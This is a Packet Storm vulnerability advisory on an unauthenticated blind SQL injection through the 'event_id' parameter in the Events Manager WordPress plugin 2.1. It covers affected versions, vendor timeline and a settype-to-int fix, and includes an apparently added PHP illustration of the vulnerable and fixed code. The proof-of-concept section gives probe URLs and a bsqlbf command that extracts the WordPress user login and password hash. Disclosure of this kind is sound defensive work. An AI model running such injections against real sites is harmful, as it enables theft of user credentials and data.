
Events Manager Wordpress Plugin 2.1 Blind SQL Injection

Events Manager Wordpress Plugin 2.1 Blind SQL Injection
Posted May 12, 2010
Authored by Danilo Massa

Events Manager Wordpress plugin versions 2.1 and below suffer from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 8566c6175eee457fa12fcfee02c44dca

=============================================
- Release date: May 10th, 2010
- Discovered by: Danilo Massa
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Events Manager Wordpress plugin <= 2.1 Blind SQL Injection
II. BACKGROUND
-------------------------
Events Manager 2.0 is a full-featured event management solution for Wordpress.
Events Manager supports recurring events, location data, RSVP and maps.
With Events Manager you can plan and publish your tour, or let people reserve
spaces for your weekly meetings.
You can then add event lists, calendars and descriptions to your blog using a sidebar
widget or shortcodes; if you're a web designer you can simply employ the template tags
provided by Events Manager.
III. INTRODUCTION
-------------------------
Events Manager versions 2.0rc2 and 2.1 have a blind SQL injection when a single event page is
shown to users. No authentication is required.
IV. DESCRIPTION
-------------------------
Input passed via the "event_id" parameter to the admin-defined event page is not properly
sanitised before being used in a SQL query.
This happens in the events-manager.php file at the following lines (version 2.1):
436: $event_ID = dbem_sanitize_request($_REQUEST ['event_id']);
534: $event_ID = dbem_sanitize_request($_REQUEST ['event_id']);
dbem_sanitize_request only quotes SQL reserved characters and does not force the event_id parameter
to be an integer. Because the value is used unquoted in the query, escaping quote characters does not prevent injection.

V. PROOF OF CONCEPT
-------------------------
Below is a harmless test that can be executed on the page that shows a single event.
http://<wordpress_site>/<event_page>?event_id=<existing_event_id>%20and%201=1
http://<wordpress_site>/<event_page>?event_id=<existing_event_id>%20and%201=0
A more complex test case can be executed using Blind Sql Injection Brute Forcer version 2:
 ./bsqlbf-v2-4.pl -url http://<wordpress_site>/<event_page>?event_id=<existing_event_id> -blind event_id -sql "(SELECT concat(user_login,0x3a,user_pass) from wp_users limit 0,1)" -database 1 -type 0 -match "<string_in_existing_event_web_page>"
retrieving the first user in the Wordpress database and its password hash.
VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve any data from
databases accessible to the Wordpress database user.
VII. SYSTEMS AFFECTED
-------------------------
Versions 2.0rc2 and 2.1 are vulnerable.
Versions <= 2.0rc2 could be vulnerable.
VIII. SOLUTION
-------------------------
Upgrade to a patched release (>= 2.2) or, as a quick workaround, put
 settype($event_ID, "int");
just after the lines listed in the DESCRIPTION section.
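The defect described in section IV and the workaround from section VIII side by side, as an added PHP illustration that is not the plugin's code. The sanitiser stub (modelled with addslashes) and the table name are assumptions:

```php
<?php
// Added illustration, not code from Events Manager. The real
// dbem_sanitize_request() is not reproduced; this stub is an ASSUMPTION that
// models the behaviour the advisory describes: quote characters are escaped,
// but the value is never coerced to a type.
function dbem_sanitize_request_model($value) {
    return addslashes($value);
}

// Vulnerable pattern: the escaped value is interpolated unquoted, so
// escaping quotes cannot stop SQL syntax from reaching the query.
// (The table name is a placeholder, not the plugin's actual table.)
function build_event_query_vulnerable(array $request) {
    $event_ID = dbem_sanitize_request_model($request['event_id']);
    return "SELECT * FROM events_table_placeholder WHERE event_id = $event_ID";
}

// Hardened pattern: the advisory's workaround applied right after the
// sanitiser. A PHP integer cannot carry SQL syntax into the query.
function build_event_query_fixed(array $request) {
    $event_ID = dbem_sanitize_request_model($request['event_id']);
    settype($event_ID, "int");
    return "SELECT * FROM events_table_placeholder WHERE event_id = $event_ID";
}

// Constructed inputs: a normal id and the decoded form of the advisory's
// harmless probe "<id>%20and%201=0".
$benign = ['event_id' => '7'];
$probe  = ['event_id' => '7 and 1=0'];

echo build_event_query_vulnerable($benign), "\n"; // ... WHERE event_id = 7
echo build_event_query_vulnerable($probe), "\n";  // ... WHERE event_id = 7 and 1=0
echo build_event_query_fixed($probe), "\n";       // ... WHERE event_id = 7
```

In WordPress code the idiomatic form is $wpdb->prepare() with a %d placeholder, which enforces the same integer constraint at the query layer.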
IX. REFERENCES
-------------------------
http://davidebenini.it/wordpress-plugins/events-manager/
http://davidebenini.it/blog/
X. CREDITS
-------------------------
The vulnerability has been discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com
XI. VULNERABILITY HISTORY
-------------------------
April 08th, 2010: Vulnerability identification
April 09th, 2010: Vendor notification
April 10th, 2010: Vendor releases an updated version (2.2)
May   10th, 2010: Vulnerability disclosure
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this 
information.
© 2018 Packet Storm. All rights reserved.